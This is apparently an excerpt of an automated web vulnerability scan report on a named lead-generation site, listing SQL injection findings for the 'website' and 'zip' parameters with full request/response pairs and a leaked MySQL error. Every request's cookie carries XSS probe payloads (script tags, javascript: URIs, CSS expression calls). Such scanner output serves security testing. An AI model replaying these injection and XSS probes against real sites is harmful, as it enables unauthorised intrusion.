GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=06cuof41ks8b08ckmd06luv9l4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.229. http://www.insideup.com/ppc/leadflow/deco00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nl7sldjffco85popsi4tt5snd0; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e92ul2tfk25hhc8s7ofdo9it33; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.230. http://www.insideup.com/ppc/leadflow/deco00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:58:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8jefqnf094hntquu7vemavnsb7; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
